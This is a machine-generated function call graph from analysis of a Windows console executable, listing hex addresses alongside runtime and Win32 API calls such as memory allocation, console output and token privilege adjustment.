a05707 73884->73885 74015 9f1089 malloc _CxxThrowException free _CxxThrowException 73884->74015 74016 9f31e5 malloc _CxxThrowException free _CxxThrowException 73885->74016 73889 a056d2 73889->73884 74014 a07853 5 API calls 2 library calls 73889->74014 73890 a05712 74017 9f1e40 free 73890->74017 73893->73666 74018 9f2ba6 73894->74018 73898 a058c8 __EH_prolog 73897->73898 73899 9f2e04 2 API calls 73898->73899 73900 a058e9 73899->73900 74021 9f6c72 73900->74021 73976->73668 73977->73673 73978->73674 73979->73692 73980->73711 73984->73685 73985->73702 73988->73720 74005->73699 74006->73718 74007->73869 74008->73871 74009->73862 74010->73876 74011->73880 74012->73884 74013->73889 74014->73884 74015->73885 74016->73890 74017->73893 74019 9f1e0c ctype malloc _CxxThrowException 74018->74019 74020 9f2bbb 74019->74020 74020->73671 74023 9f6c7c __EH_prolog 74021->74023 74164->73781 74165->73774 74166->73774 74167 9f42d1 74168 9f42bd 74167->74168 74169 9f1e0c ctype 2 API calls 74168->74169 74170 9f42c5 74168->74170 74169->74170 74171 a2a42c 74172 a2a435 fputs 74171->74172 74173 a2a449 74171->74173 74329 9f1fa0 fputc 74172->74329 74330 a2545d 74173->74330 74177 9f2e04 2 API calls 74178 a2a4a1 74177->74178 74334 a11858 74178->74334 74180 a2a4c9 74396 9f1e40 free 74180->74396 74182 a2a4d8 74183 a2a4ee 74182->74183 74397 a2c7d7 74182->74397 74185 a2a50e 74183->74185 74405 a257fb 74183->74405 74415 a2c73e 74185->74415 74190 a2ac17 74593 a22db9 free ctype 74190->74593 74191 9f1e0c ctype 2 API calls 74193 a2a53a 74191->74193 74195 a2a54d 74193->74195 74551 a2b0fa malloc _CxxThrowException __EH_prolog 74193->74551 74194 a2ac23 74196 a2ac3a 74194->74196 74198 a2ac35 74194->74198 74200 9f2fec 3 API calls 74195->74200 74595 a2b96d _CxxThrowException 74196->74595 74594 a2b988 33 API calls __aulldiv 74198->74594 74207 a2a586 74200->74207 74202 a2ac42 74596 9f1e40 free 74202->74596 74204 a2ac4d 74597 a13247 74204->74597 74433 a2ad06 74207->74433 74211 a2ac7d 74604 9f11c2 free __EH_prolog ctype 74211->74604 74215 a2ac89 74605 a2be0c free __EH_prolog ctype 74215->74605 74219 a2ac98 74606 a22db9 free ctype 74219->74606 74220 9f2e04 2 API calls 74222 a2a636 74220->74222 74451 a14345 74222->74451 74225 a2aca4 74306 a2aae5 74592 a22db9 free ctype 74306->74592 74329->74173 74331 a25473 74330->74331 74332 a25466 74330->74332 74331->74177 74607 9f275e malloc _CxxThrowException free ctype 74332->74607 74335 a11862 __EH_prolog 74334->74335 74608 a1021a 74335->74608 74340 a118b9 74622 a11aa5 free __EH_prolog ctype 74340->74622 74342 a11935 74633 a11aa5 free __EH_prolog ctype 74342->74633 74343 a118c7 74623 a22db9 free ctype 74343->74623 74346 a11944 74368 a11966 74346->74368 74634 a11d73 5 API calls __EH_prolog 74346->74634 74348 a118d3 74348->74180 74351 a11958 _CxxThrowException 74351->74368 74353 a119be 74641 a1f1f1 malloc _CxxThrowException free _CxxThrowException 74353->74641 74354 9f2e04 2 API calls 74354->74368 74355 a118db 74355->74342 74624 a10144 malloc _CxxThrowException free _CxxThrowException 74355->74624 74625 a304d2 74355->74625 74631 9f1524 malloc _CxxThrowException __EH_prolog ctype 74355->74631 74632 9f1e40 free 74355->74632 74358 a119d6 74360 a17ebb free 74358->74360 74361 a119e1 74360->74361 74363 a012d4 4 API calls 74361->74363 74362 a304d2 5 API calls 74362->74368 74364 a119ea 74363->74364 74365 a17ebb free 74364->74365 74367 a119f7 74365->74367 74369 a012d4 4 API calls 74367->74369 74368->74353 74368->74354 74368->74362 74635 9f631f 74368->74635 74639 9f1524 malloc _CxxThrowException __EH_prolog ctype 74368->74639 74640 9f1e40 free 74368->74640 74375 a119ff 74369->74375 74371 a11a4f 74643 9f1e40 free 74371->74643 74372 9f1524 malloc _CxxThrowException 74372->74375 74374 a11a57 74644 a22db9 free ctype 74374->74644 74375->74371 74375->74372 74380 a11a83 74375->74380 74642 9f42e3 CharUpperW 74375->74642 74377 a11a64 74645 a22db9 free ctype 74377->74645 74646 a11d73 5 API calls __EH_prolog 74380->74646 74382 a11a97 _CxxThrowException 74383 a11aa5 __EH_prolog 74382->74383 74647 9f1e40 free 74383->74647 74385 a11ac8 74648 a102e8 free ctype 74385->74648 74387 a11ad1 74649 a11eab free __EH_prolog ctype 74387->74649 74389 a11add 74650 9f1e40 free 74389->74650 74391 a11ae5 74651 9f1e40 free 74391->74651 74393 a11aed 74652 a22db9 free ctype 74393->74652 74395 a11afa 74395->74180 74396->74182 74398 a2c849 74397->74398 74400 a2c7ea 74397->74400 74399 a2c85a 74398->74399 74838 9f1f91 fflush 74398->74838 74399->74183 74401 a2c7fe fputs 74400->74401 74837 9f25cb malloc _CxxThrowException free _CxxThrowException ctype 74400->74837 74401->74398 74406 a25805 __EH_prolog 74405->74406 74407 a25847 74406->74407 74839 9f26dd 74406->74839 74407->74185 74413 a2583f 74859 9f1e40 free 74413->74859 74416 a2c748 __EH_prolog 74415->74416 74417 a2c7d7 ctype 6 API calls 74416->74417 74418 a2c75d 74417->74418 74898 9f1e40 free 74418->74898 74420 a2c768 74899 a12c0b 74420->74899 74424 a2c77d 74905 9f1e40 free 74424->74905 74426 a2c785 74906 9f1e40 free 74426->74906 74428 a2c78d 74907 9f1e40 free 74428->74907 74430 a2c795 74431 a12c0b ctype free 74430->74431 74432 a2a51d 74431->74432 74432->74191 74432->74306 74910 a2ad29 74433->74910 74436 a2bf3e 74437 9f2fec 3 API calls 74436->74437 74438 a2bf85 74437->74438 74439 9f2fec 3 API calls 74438->74439 74440 a2a5ee 74439->74440 74441 a03a29 74440->74441 74442 a03a3b 74441->74442 74448 a03a37 74441->74448 74916 a03bd9 free ctype 74442->74916 74444 a03a42 74445 a03a6f 74444->74445 74446 a03a52 _CxxThrowException 74444->74446 74447 a03a67 74444->74447 74445->74448 74918 a03b76 malloc _CxxThrowException __EH_prolog ctype 74445->74918 74446->74447 74917 a30551 malloc _CxxThrowException free memcpy ctype 74447->74917 74448->74220 74452 a1434f __EH_prolog 74451->74452 74453 9f2e04 2 API calls 74452->74453 74454 a1436d 74453->74454 74455 9f2e04 2 API calls 74454->74455 74551->74195 74592->74190 74593->74194 74594->74196 74595->74202 74596->74204 74598 a1324e 74597->74598 74599 a13260 74598->74599 75841 9f1e40 free 74598->75841 75840 9f1e40 free 74599->75840 74602 a13267 74603 9f1e40 free 74602->74603 74603->74211 74604->74215 74605->74219 74606->74225 74607->74331 74609 a10224 __EH_prolog 74608->74609 74653 a03d66 74609->74653 74612 a1062e 74618 a10638 __EH_prolog 74612->74618 74613 a106de 74740 a1019a malloc _CxxThrowException free memcpy 74613->74740 74615 a106e6 74741 a11453 26 API calls 2 library calls 74615->74741 74616 a101bc malloc _CxxThrowException free _CxxThrowException memcpy 74616->74618 74618->74613 74618->74616 74621 a106ee 74618->74621 74669 a10703 74618->74669 74739 a22db9 free ctype 74618->74739 74621->74340 74621->74355 74622->74343 74623->74348 74624->74355 74626 a30513 74625->74626 74627 a304df 74625->74627 74626->74355 74628 a304e8 _CxxThrowException 74627->74628 74629 a304fd 74627->74629 74628->74629 74780 a30551 malloc _CxxThrowException free memcpy ctype 74629->74780 74631->74355 74632->74355 74633->74346 74634->74351 74636 9f9245 74635->74636 74781 9f90da 74636->74781 74639->74368 74640->74368 74641->74358 74642->74375 74643->74374 74644->74377 74645->74348 74646->74382 74647->74385 74648->74387 74649->74389 74650->74391 74651->74393 74652->74395 74664 a8fb10 74653->74664 74655 a03d70 GetCurrentProcess 74665 a03e04 74655->74665 74657 a03d8d OpenProcessToken 74658 a03de3 74657->74658 74659 a03d9e LookupPrivilegeValueW 74657->74659 74661 a03e04 CloseHandle 74658->74661 74659->74658 74660 a03dc0 AdjustTokenPrivileges 74659->74660 74660->74658 74662 a03dd5 GetLastError 74660->74662 74663 a03def 74661->74663 74662->74658 74663->74612 74664->74655 74666 a03e11 CloseHandle 74665->74666 74667 a03e0d 74665->74667 74668 a03e21 74666->74668 74667->74657 74668->74657 74695 a1070d __EH_prolog 74669->74695 74670 a10e1d 74777 a10416 18 API calls 2 library calls 74670->74777 74672 a10ea6 74779 a3ec78 free ctype 74672->74779 74673 a10d11 74771 9f7496 7 API calls 2 library calls 74673->74771 74676 a10c13 74768 9f1e40 free 74676->74768 74678 9f2da9 2 API calls 74678->74695 74680 a10c83 74680->74670 74680->74673 74681 a10b40 74681->74618 74682 a10de0 74773 a22db9 free ctype 74682->74773 74683 9f2da9 2 API calls 74704 a10ab5 74683->74704 74684 a10e47 74684->74672 74778 a1117d 68 API calls 2 library calls 74684->74778 74685 9f2f1c 2 API calls 74697 a10d29 74685->74697 74688 9f2e04 2 API calls 74688->74695 74689 9f2e04 2 API calls 74689->74704 74692 a10e02 74776 a22db9 free ctype 74692->74776 74694 9f2e04 2 API calls 74694->74697 74695->74678 74695->74680 74695->74681 74695->74688 74698 9f2fec 3 API calls 74695->74698 74695->74704 74711 a10b26 74695->74711 74732 a10b48 74695->74732 74734 a22db9 free ctype 74695->74734 74735 a304d2 malloc _CxxThrowException free _CxxThrowException memcpy 74695->74735 74736 9f1524 malloc _CxxThrowException 74695->74736 74737 9f1e40 free ctype 74695->74737 74742 9f2f4a malloc _CxxThrowException free ctype 74695->74742 74743 9f1089 malloc _CxxThrowException free _CxxThrowException 74695->74743 74744 a113eb 5 API calls 2 library calls 74695->74744 74745 a1050b 74695->74745 74750 a10021 GetLastError 74695->74750 74751 9f49bd 9 API calls 2 library calls 74695->74751 74752 a10306 12 API calls 74695->74752 74753 a0ff00 5 API calls 2 library calls 74695->74753 74754 a1057d 16 API calls 2 library calls 74695->74754 74755 a10f8e 24 API calls 2 library calls 74695->74755 74756 9f472e CharUpperW 74695->74756 74757 a08984 malloc _CxxThrowException free _CxxThrowException memcpy 74695->74757 74758 a10ef4 68 API calls 2 library calls 74695->74758 74697->74682 74697->74685 74697->74694 74702 9f2fec 3 API calls 74697->74702 74710 a10df3 74697->74710 74712 9f1e40 free ctype 74697->74712 74715 a10df8 74697->74715 74772 a1117d 68 API calls 2 library calls 74697->74772 74698->74695 74702->74697 74703 9f2fec 3 API calls 74703->74704 74704->74676 74704->74683 74704->74689 74704->74703 74708 a1050b 44 API calls 74704->74708 74717 a10c79 74704->74717 74720 9f1e40 free ctype 74704->74720 74759 9f2f4a malloc _CxxThrowException free ctype 74704->74759 74764 9f1089 malloc _CxxThrowException free _CxxThrowException 74704->74764 74765 a113eb 5 API calls 2 library calls 74704->74765 74766 a10ef4 68 API calls 2 library calls 74704->74766 74767 a22db9 free ctype 74704->74767 74769 a10021 GetLastError 74704->74769 74708->74704 74774 9f1e40 free 74710->74774 74760 9f1e40 free 74711->74760 74712->74697 74775 9f1e40 free 74715->74775 74770 9f1e40 free 74717->74770 74718 a10b30 74761 9f1e40 free 74718->74761 74720->74704 74723 a10b38 74762 9f1e40 free 74723->74762 74763 a22db9 free ctype 74732->74763 74734->74695 74735->74695 74736->74695 74737->74695 74739->74618 74740->74615 74741->74621 74742->74695 74743->74695 74744->74695 74746 9f6c72 44 API calls 74745->74746 74749 a1051e 74746->74749 74747 a10575 74747->74695 74748 9f2f88 3 API calls 74748->74747 74749->74747 74749->74748 74750->74695 74751->74695 74752->74695 74753->74695 74754->74695 74755->74695 74756->74695 74757->74695 74758->74695 74759->74704 74760->74718 74761->74723 74762->74681 74763->74711 74764->74704 74765->74704 74766->74704 74767->74704 74768->74681 74769->74704 74770->74680 74771->74697 74772->74697 74773->74681 74774->74715 74775->74692 74776->74681 74777->74684 74778->74684 74779->74681 74780->74626 74782 9f90e4 __EH_prolog 74781->74782 74783 9f2f88 3 API calls 74782->74783 74785 9f90f7 74783->74785 74784 9f915d 74786 9f2e04 2 API calls 74784->74786 74785->74784 74790 9f9109 74785->74790 74787 9f9165 74786->74787 74788 9f91be 74787->74788 74792 9f9174 74787->74792 74831 9f6332 6 API calls 2 library calls 74788->74831 74791 9f9155 74790->74791 74822 9f2e47 74790->74822 74791->74368 74793 9f2f88 3 API calls 74792->74793 74794 9f917d 74793->74794 74819 9f91ca 74794->74819 74829 9f859e malloc _CxxThrowException free _CxxThrowException 74794->74829 74796 9f9122 74826 9f8f57 memmove 74796->74826 74799 9f912e 74802 9f914d 74799->74802 74827 9f31e5 malloc _CxxThrowException free _CxxThrowException 74799->74827 74801 9f9185 74805 9f2e04 2 API calls 74801->74805 74828 9f1e40 free 74802->74828 74806 9f9197 74805->74806 74807 9f919f 74806->74807 74808 9f91ce 74806->74808 74810 9f91b9 74807->74810 74830 9f1089 malloc _CxxThrowException free _CxxThrowException 74807->74830 74809 9f2f88 3 API calls 74808->74809 74809->74810 74832 9f3199 malloc _CxxThrowException free _CxxThrowException 74810->74832 74813 9f91e6 74833 9f8f57 memmove 74813->74833 74815 9f91ee 74816 9f91f2 74815->74816 74818 9f2fec 3 API calls 74815->74818 74835 9f1e40 free 74816->74835 74820 9f9212 74818->74820 74836 9f1e40 free 74819->74836 74834 9f31e5 malloc _CxxThrowException free _CxxThrowException 74820->74834 74823 9f2e57 74822->74823 74824 9f2ba6 2 API calls 74823->74824 74825 9f2e6a 74824->74825 74825->74796 74825->74825 74826->74799 74827->74802 74828->74791 74829->74801 74830->74810 74831->74794 74832->74813 74833->74815 74834->74816 74835->74819 74836->74791 74837->74401 74838->74399 74840 9f1e0c ctype 2 API calls 74839->74840 74841 9f26ea 74840->74841 74842 a25678 74841->74842 74843 a256b1 74842->74843 74844 a25689 74842->74844 74860 a25593 74843->74860 74846 a25593 6 API calls 74844->74846 74848 a256a5 74846->74848 74874 9f28a1 74848->74874 74852 a2570e fputs 74858 9f1fa0 fputc 74852->74858 74854 a256ef 74855 a25593 6 API calls 74854->74855 74856 a25701 74855->74856 74857 a25711 6 API calls 74856->74857 74857->74852 74858->74413 74859->74407 74861 a255ad 74860->74861 74862 9f28a1 5 API calls 74861->74862 74863 a255b8 74862->74863 74879 9f286d 74863->74879 74866 9f28a1 5 API calls 74867 a255c7 74866->74867 74868 a25711 74867->74868 74869 a25721 74868->74869 74870 a256e0 74868->74870 74871 9f28a1 5 API calls 74869->74871 74870->74852 74878 9f2881 malloc _CxxThrowException free memcpy _CxxThrowException 74870->74878 74872 a2572b 74871->74872 74887 a255cd 6 API calls 74872->74887 74875 9f28b0 74874->74875 74888 9f267f 74875->74888 74877 9f28bf 74877->74843 74878->74854 74882 9f1e9d 74879->74882 74883 9f1ead 74882->74883 74884 9f1ea8 74882->74884 74883->74866 74886 9f263c malloc _CxxThrowException free memcpy _CxxThrowException 74884->74886 74886->74883 74887->74870 74889 9f26c2 74888->74889 74891 9f2693 74888->74891 74889->74877 74890 9f26c8 _CxxThrowException 74893 9f26dd 74890->74893 74891->74890 74892 9f26bc 74891->74892 74897 9f2595 malloc _CxxThrowException free memcpy ctype 74892->74897 74894 9f1e0c ctype 2 API calls 74893->74894 74896 9f26ea 74894->74896 74896->74877 74897->74889 74898->74420 74908 9f1e40 free 74899->74908 74901 a12c16 74909 9f1e40 free 74901->74909 74903 a12c1e 74904 9f1e40 free 74903->74904 74904->74424 74905->74426 74906->74428 74907->74430 74908->74901 74909->74903 74911 a2ad33 __EH_prolog 74910->74911 74912 9f2e04 2 API calls 74911->74912 74913 a2ad5f 74912->74913 74914 9f2e04 2 API calls 74913->74914 74915 a2a5d8 74914->74915 74915->74436 74916->74444 74917->74445 74918->74445 75840->74602 75841->74598 75842 a38eb1 75847 a38ed1 75842->75847 75845 a38ec9 75848 a38edb __EH_prolog 75847->75848 75856 a39267 75848->75856 75852 a38efd 75861 a2e5f1 free ctype 75852->75861 75854 a38eb9 75854->75845 75855 9f1e40 free 75854->75855 75855->75845 75857 a39271 __EH_prolog 75856->75857 75862 9f1e40 free 75857->75862 75859 a38ef1 75860 a3922b free CloseHandle GetLastError ctype 75859->75860 75860->75852 75861->75854 75862->75859 75863 a2adb7 75864 a2adc1 __EH_prolog 75863->75864 75865 9f26dd 2 API calls 75864->75865 75866 a2ae1d 75865->75866 75867 9f2e04 2 API calls 75866->75867 75868 a2ae38 75867->75868 75869 9f2e04 2 API calls 75868->75869 75870 a2ae44 75869->75870 75871 9f2e04 2 API calls 75870->75871 75872 a2ae68 75871->75872 75873 a2ad29 2 API calls 75872->75873 75874 a2ae85 75873->75874 75879 a2af2d 75874->75879 75876 a2ae94 75877 9f2e04 2 API calls 75876->75877 75878 a2aeb2 75877->75878 75880 a2af37 __EH_prolog 75879->75880 75891 a034f4 malloc _CxxThrowException __EH_prolog 75880->75891 75882 a2afac 75883 9f2e04 2 API calls 75882->75883 75884 a2afbb 75883->75884 75885 9f2e04 2 API calls 75884->75885 75886 a2afca 75885->75886 75887 9f2e04 2 API calls 75886->75887 75888 a2afd9 75887->75888 75889 9f2e04 2 API calls 75888->75889 75890 a2afe8 75889->75890 75890->75876 75891->75882 75895 a25475 75896 9f2fec 3 API calls 75895->75896 75897 a254b4 75896->75897 75898 a2c911 24 API calls 75897->75898 75899 a254bb 75898->75899 75900 a769f0 free 75901 a8ffb1 __setusermatherr 75902 a8ffbd 75901->75902 75907 a90068 _controlfp 75902->75907 75904 a8ffc2 _initterm __getmainargs _initterm __p___initenv 75905 a2c27c 75904->75905 75906 a9001d exit _XcptFilter 75905->75906 75907->75904 75908 a1cefb 75909 a1cf03 75908->75909 75937 a1d0cc 75908->75937 75909->75937 75955 a1cae9 VariantClear 75909->75955 75911 a1cf59 75911->75937 75956 a1cae9 VariantClear 75911->75956 75913 a1cf71 75913->75937 75957 a1cae9 VariantClear 75913->75957 75915 a1cf87 75915->75937 75958 a1cae9 VariantClear 75915->75958 75917 a1cf9d 75917->75937 75959 a1cae9 VariantClear 75917->75959 75919 a1cfb3 75919->75937 75960 a1cae9 VariantClear 75919->75960 75921 a1cfc9 75921->75937 75961 9f4504 malloc _CxxThrowException 75921->75961 75923 a1cfdc 75924 9f2e04 2 API calls 75923->75924 75926 a1cfe7 75924->75926 75925 a1d009 75929 a1d080 75925->75929 75930 a1d030 75925->75930 75949 a1d07b 75925->75949 75926->75925 75927 9f2f88 3 API calls 75926->75927 75927->75925 75966 a17a0c CharUpperW 75929->75966 75933 9f2e04 2 API calls 75930->75933 75931 a1d0c4 75970 9f1e40 free 75931->75970 75936 a1d038 75933->75936 75935 a1d08b 75967 a0fdbc 4 API calls 2 library calls 75935->75967 75938 9f2e04 2 API calls 75936->75938 75940 a1d046 75938->75940 75962 a0fdbc 4 API calls 2 library calls 75940->75962 75941 a1d0a7 75943 9f2fec 3 API calls 75941->75943 75945 a1d0b3 75943->75945 75944 a1d057 75946 9f2fec 3 API calls 75944->75946 75968 9f1e40 free 75945->75968 75948 a1d063 75946->75948 75963 9f1e40 free 75948->75963 75969 9f1e40 free 75949->75969 75951 a1d06b 75964 9f1e40 free 75951->75964 75953 a1d073 75965 9f1e40 free 75953->75965 75955->75911 75956->75913 75957->75915 75958->75917 75959->75919 75960->75921 75961->75923 75962->75944 75963->75951 75964->75953 75965->75949 75966->75935 75967->75941 75968->75949 75969->75931 75970->75937 75971 9fb144 75972 9fb153 75971->75972 75974 9fb159 75971->75974 75973 a011b4 107 API calls 75972->75973 75973->75974 75975 a2993d 76059 a2b5b1 75975->76059 75978 a29963 76065 a01f33 75978->76065 75979 9f1fb3 11 API calls 75979->75978 75981 a29975 75982 a299b7 GetStdHandle GetConsoleScreenBufferInfo 75981->75982 75983 a299ce 75981->75983 75982->75983 75984 9f1e0c ctype 2 API calls 75983->75984 75985 a299dc 75984->75985 76186 a17b48 75985->76186 75987 a29a29 76203 a2b96d _CxxThrowException 75987->76203 75989 a29a30 76204 a17018 8 API calls 2 library calls 75989->76204 75991 a29a7c 76205 a1ddb5 6 API calls 2 library calls 75991->76205 75992 a29a66 _CxxThrowException 75992->75991 75994 a29aa6 75996 a29aaa _CxxThrowException 75994->75996 76004 a29ac0 75994->76004 75995 a29a37 75995->75991 75995->75992 75996->76004 75997 a29b3a 76209 9f1fa0 fputc 75997->76209 75999 a29bfa _CxxThrowException 76014 a29be6 75999->76014 76001 a29b63 fputs 76210 9f1fa0 fputc 76001->76210 76004->75997 76004->75999 76206 a17dd7 7 API calls 2 library calls 76004->76206 76207 a2c077 6 API calls 76004->76207 76208 9f1e40 free 76004->76208 76005 a29b79 strlen strlen 76007 a29e25 76005->76007 76008 a29baa fputs fputc 76005->76008 76218 9f1fa0 fputc 76007->76218 76008->76014 76010 a29e2c fputs 76219 9f1fa0 fputc 76010->76219 76012 a29f0c 76224 9f1fa0 fputc 76012->76224 76014->76007 76014->76008 76018 a2b67d 12 API calls 76014->76018 76023 9f2e04 2 API calls 76014->76023 76036 a29d2a fputs 76014->76036 76042 a29d5f fputs 76014->76042 76043 9f31e5 malloc _CxxThrowException free _CxxThrowException 76014->76043 76211 9f21d8 fputs 76014->76211 76212 9f315e malloc _CxxThrowException free _CxxThrowException 76014->76212 76213 9f3221 malloc _CxxThrowException free _CxxThrowException 76014->76213 76214 9f1089 malloc _CxxThrowException free _CxxThrowException 76014->76214 76216 9f1fa0 fputc 76014->76216 76217 9f1e40 free 76014->76217 76016 a29f13 fputs 76225 9f1fa0 fputc 76016->76225 76018->76014 76020 a29f9f 76022 a2ac3a 76020->76022 76025 a2ac35 76020->76025 76231 a2b96d _CxxThrowException 76022->76231 76023->76014 76230 a2b988 33 API calls __aulldiv 76025->76230 76028 a2ac42 76232 9f1e40 free 76028->76232 76031 a2ac4d 76033 a13247 free 76031->76033 76034 a2ac5d 76033->76034 76233 9f1e40 free 76034->76233 76035 a29f29 76035->76020 76047 a29f77 fputs 76035->76047 76226 a2b650 fputc fputs fputs fputc 76035->76226 76227 a2b5e9 fputc fputs 76035->76227 76228 a2bde4 fputc fputs 76035->76228 76215 9f21d8 fputs 76036->76215 76041 a2ac7d 76234 9f11c2 free __EH_prolog ctype 76041->76234 76042->76014 76043->76014 76229 9f1fa0 fputc 76047->76229 76048 a2ac89 76053 a29ee0 fputs 76223 9f1fa0 fputc 76053->76223 76057 a29e42 76057->76012 76057->76053 76220 a2b650 fputc fputs fputs fputc 76057->76220 76221 9f21d8 fputs 76057->76221 76222 a2bde4 fputc fputs 76057->76222 76060 a2994a 76059->76060 76061 a2b5bc fputs 76059->76061 76060->75978 76060->75979 76237 9f1fa0 fputc 76061->76237 76063 a2b5d5 76063->76060 76064 a2b5d9 fputs 76063->76064 76064->76060 76066 a01f6c 76065->76066 76067 a01f4f 76065->76067 76238 a029eb 76066->76238 76270 a11d73 5 API calls __EH_prolog 76067->76270 76070 a01f5e _CxxThrowException 76070->76066 76072 a01fa3 76074 a01fbc 76072->76074 76076 9f4fc0 5 API calls 76072->76076 76077 a01fda 76074->76077 76078 9f2fec 3 API calls 76074->76078 76075 a01f95 _CxxThrowException 76075->76072 76076->76074 76079 a02022 wcscmp 76077->76079 76088 a02036 76077->76088 76078->76077 76080 a020af 76079->76080 76079->76088 76272 a11d73 5 API calls __EH_prolog 76080->76272 76082 a020be _CxxThrowException 76082->76088 76083 a020a9 76273 a0393c 6 API calls 2 library calls 76083->76273 76085 a020f4 76274 a0393c 6 API calls 2 library calls 76085->76274 76087 a02108 76089 a02135 76087->76089 76275 a02e04 62 API calls 2 library calls 76087->76275 76088->76083 76091 a0219a 76088->76091 76097 a02159 76089->76097 76276 a02e04 62 API calls 2 library calls 76089->76276 76277 a11d73 5 API calls __EH_prolog 76091->76277 76094 a021a9 _CxxThrowException 76094->76097 76095 a0227f 76243 a02aa9 76095->76243 76096 a02245 76100 9f2fec 3 API calls 76096->76100 76097->76095 76097->76096 76278 a11d73 5 API calls __EH_prolog 76097->76278 76103 a0225c 76100->76103 76102 a02237 _CxxThrowException 76102->76096 76103->76095 76279 a11d73 5 API calls __EH_prolog 76103->76279 76104 a022d9 76106 a02302 76104->76106 76107 9f2fec 3 API calls 76104->76107 76105 9f2fec 3 API calls 76105->76104 76108 9f4fc0 5 API calls 76106->76108 76107->76106 76110 a02315 76108->76110 76261 a0384c 76110->76261 76111 a02271 _CxxThrowException 76111->76095 76113 a02322 76117 a026c6 76113->76117 76126 a023a1 76113->76126 76114 a028ce 76115 a0293a 76114->76115 76129 a028d5 76114->76129 76120 a029a5 76115->76120 76121 a0293f 76115->76121 76116 a02700 76293 a032ec 14 API calls 2 library calls 76116->76293 76117->76114 76117->76116 76292 a11d73 5 API calls __EH_prolog 76117->76292 76123 a029ae _CxxThrowException 76120->76123 76178 a0264d 76120->76178 76300 9f4eec 16 API calls 76121->76300 76122 a026f2 _CxxThrowException 76122->76116 76124 a02713 76130 a03a29 5 API calls 76124->76130 76127 a0247a wcscmp 76126->76127 76147 a0248e 76126->76147 76132 a024cf wcscmp 76127->76132 76127->76147 76129->76178 76299 a11d73 5 API calls __EH_prolog 76129->76299 76142 a02722 76130->76142 76131 a0294c 76301 9f4ea1 8 API calls 76131->76301 76137 a024ef wcscmp 76132->76137 76132->76147 76134 a02953 76138 9f4fc0 5 API calls 76134->76138 76140 a0250f 76137->76140 76137->76147 76138->76178 76139 a02920 _CxxThrowException 76139->76178 76283 a11d73 5 API calls __EH_prolog 76140->76283 76144 a027cf 76142->76144 76146 9f2fec 3 API calls 76142->76146 76143 a0251e _CxxThrowException 76145 a0252c 76143->76145 76148 a02880 76144->76148 76153 a0281f 76144->76153 76295 a11d73 5 API calls __EH_prolog 76144->76295 76149 a02569 76145->76149 76284 a02e04 62 API calls 2 library calls 76145->76284 76150 a027a9 76146->76150 76147->76145 76280 9f4eec 16 API calls 76147->76280 76281 9f4ea1 8 API calls 76147->76281 76282 a11d73 5 API calls __EH_prolog 76147->76282 76151 a0289b 76148->76151 76158 9f2fec 3 API calls 76148->76158 76155 a0258c 76149->76155 76285 a02e04 62 API calls 2 library calls 76149->76285 76150->76144 76294 9f3563 memmove 76150->76294 76151->76178 76298 a11d73 5 API calls __EH_prolog 76151->76298 76153->76148 76159 a02847 76153->76159 76296 a11d73 5 API calls __EH_prolog 76153->76296 76161 a025a4 76155->76161 76286 a02a61 malloc _CxxThrowException free _CxxThrowException memcpy 76155->76286 76156 a024c1 _CxxThrowException 76156->76132 76158->76151 76159->76148 76297 a11d73 5 API calls __EH_prolog 76159->76297 76287 9f4eec 16 API calls 76161->76287 76162 a02811 _CxxThrowException 76162->76153 76168 a028c0 _CxxThrowException 76168->76114 76169 a02839 _CxxThrowException 76169->76159 76171 a025ad 76288 a11b07 49 API calls 76171->76288 76172 a02872 _CxxThrowException 76172->76148 76174 a025b4 76289 9f4ea1 8 API calls 76174->76289 76176 a025bb 76177 9f2fec 3 API calls 76176->76177 76180 a025d6 76176->76180 76177->76180 76178->75981 76179 a0261f 76179->76178 76181 9f2fec 3 API calls 76179->76181 76180->76178 76180->76179 76290 a11d73 5 API calls __EH_prolog 76180->76290 76183 a0263f 76181->76183 76291 9f859e malloc _CxxThrowException free _CxxThrowException 76183->76291 76184 a02611 _CxxThrowException 76184->76179 76187 a17b52 __EH_prolog 76186->76187 76311 a17eec 76187->76311 76190 a17ca4 76190->75987 76191 9f30ea malloc _CxxThrowException free 76198 a17b63 76191->76198 76192 9f2e04 malloc _CxxThrowException 76192->76198 76194 9f1e40 free ctype 76194->76198 76196 a304d2 5 API calls 76196->76198 76198->76190 76198->76191 76198->76192 76198->76194 76198->76196 76200 9f429a 3 API calls 76198->76200 76201 a17c61 memcpy 76198->76201 76316 a170ea 76198->76316 76319 a17a40 76198->76319 76337 a17cc3 6 API calls 76198->76337 76338 a012a5 76198->76338 76343 a174eb malloc _CxxThrowException memcpy __EH_prolog ctype 76198->76343 76344 a17193 76198->76344 76200->76198 76201->76198 76203->75989 76204->75995 76205->75994 76206->76004 76207->76004 76208->76004 76209->76001 76210->76005 76211->76014 76212->76014 76213->76014 76214->76014 76215->76014 76216->76014 76217->76014 76218->76010 76219->76057 76220->76057 76221->76057 76222->76057 76223->76057 76224->76016 76225->76035 76226->76035 76227->76035 76228->76035 76229->76035 76230->76022 76231->76028 76232->76031 76233->76041 76234->76048 76237->76063 76239 9f2f1c 2 API calls 76238->76239 76240 a029fe 76239->76240 76302 9f1e40 free 76240->76302 76242 a01f7e 76242->76072 76271 a11d73 5 API calls __EH_prolog 76242->76271 76244 a02ab3 __EH_prolog 76243->76244 76245 9f2e8a 2 API calls 76244->76245 76254 a02b0f 76244->76254 76247 a02af4 76245->76247 76246 a022ad 76246->76104 76246->76105 76303 a02a61 malloc _CxxThrowException free _CxxThrowException memcpy 76247->76303 76249 a02b04 76304 9f1e40 free 76249->76304 76250 a02bc6 76309 a11d73 5 API calls __EH_prolog 76250->76309 76253 a02bd6 _CxxThrowException 76253->76246 76254->76246 76254->76250 76258 a02b9f 76254->76258 76305 a02cb4 48 API calls 2 library calls 76254->76305 76306 a02bf5 8 API calls __EH_prolog 76254->76306 76307 a02a61 malloc _CxxThrowException free _CxxThrowException memcpy 76254->76307 76258->76246 76308 a11d73 5 API calls __EH_prolog 76258->76308 76260 a02bb8 _CxxThrowException 76260->76250 76268 a03856 __EH_prolog 76261->76268 76262 a03917 76262->76113 76263 9f2e04 malloc _CxxThrowException 76263->76268 76264 9f2fec 3 API calls 76264->76268 76265 9f2f88 3 API calls 76265->76268 76266 a304d2 5 API calls 76266->76268 76268->76262 76268->76263 76268->76264 76268->76265 76268->76266 76269 9f1e40 free ctype 76268->76269 76310 a03b76 malloc _CxxThrowException __EH_prolog ctype 76268->76310 76269->76268 76270->76070 76271->76075 76272->76082 76273->76085 76274->76087 76275->76089 76276->76097 76277->76094 76278->76102 76279->76111 76280->76147 76281->76147 76282->76156 76283->76143 76284->76149 76285->76155 76286->76161 76287->76171 76288->76174 76289->76176 76290->76184 